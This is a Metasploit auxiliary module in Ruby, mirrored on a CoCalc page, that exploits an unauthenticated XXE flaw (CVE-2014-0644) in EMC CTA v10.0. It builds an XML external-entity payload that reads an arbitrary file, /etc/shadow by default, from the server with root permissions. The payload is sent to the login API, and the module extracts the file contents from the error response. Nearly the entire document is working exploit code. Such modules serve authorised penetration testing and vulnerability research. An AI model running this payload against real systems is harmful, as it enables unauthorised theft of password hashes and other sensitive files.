CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/emc_cta_xxe.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',

12
      'Description'    => %q{

13
      EMC CTA v10.0 is susceptible to an unauthenticated XXE attack

14
      that allows an attacker to read arbitrary files from the file system

15
      with the permissions of the root user.

16
      },

17
      'License'        => MSF_LICENSE,

18
      'Author'         =>

19
        [

20
          'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module

21
        ],

22
      'References'     =>

23
        [

24
          ['CVE', '2014-0644'],

25
          ['EDB', '32623']

26
        ],

27
      'DisclosureDate' => '2014-03-31'

28
    ))

29


30
    register_options(

31
      [

32
        Opt::RPORT(443),

33
        OptBool.new('SSL', [true, 'Use SSL', true]),

34
        OptString.new('TARGETURI', [ true, "Base directory path", '/']),

35
        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),

36
      ]

37
    )

38
  end

39


40
  def run

41


42
    doctype = Rex::Text.rand_text_alpha(6)

43
    element = Rex::Text.rand_text_alpha(6)

44
    entity = Rex::Text.rand_text_alpha(6)

45


46
    pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>

47
<!DOCTYPE #{doctype} [

48
<!ELEMENT #{element} ANY >

49
<!ENTITY #{entity} SYSTEM "file://#{datastore['FILEPATH']}" >]>

50
<Request>

51
<Username>root</Username>

52
<Password>&#{entity};</Password>

53
</Request>

54
    }

55


56
    res = send_request_cgi({

57
      'uri' => normalize_uri(target_uri.path, 'api', 'login'),

58
      'method' => 'POST',

59
      'data' => pay

60
    })

61


62
    if !res or !res.body

63
      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")

64
    end

65


66
    file = /For input string: "(.*)"/m.match(res.body)

67


68
    if !file or file.length < 2

69
      fail_with(Failure::UnexpectedReply, "File was unretrievable. Was it a binary file?")

70
    end

71


72
    file = file[1]

73


74
    path = store_loot('emc.file', 'text/plain', datastore['RHOST'], file, datastore['FILEPATH'])

75


76
    print_good("File saved to: " + path)

77
  end

78
end

79


80